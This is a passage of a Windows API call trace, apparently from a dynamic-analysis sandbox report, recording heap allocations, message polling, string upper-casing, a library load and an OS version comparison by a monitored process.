returned 0x24b1888 [0256.236] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.236] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.236] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.237] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.237] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.240] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.241] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0256.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.241] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.242] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.242] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.243] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.243] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.244] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.245] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.246] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.247] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 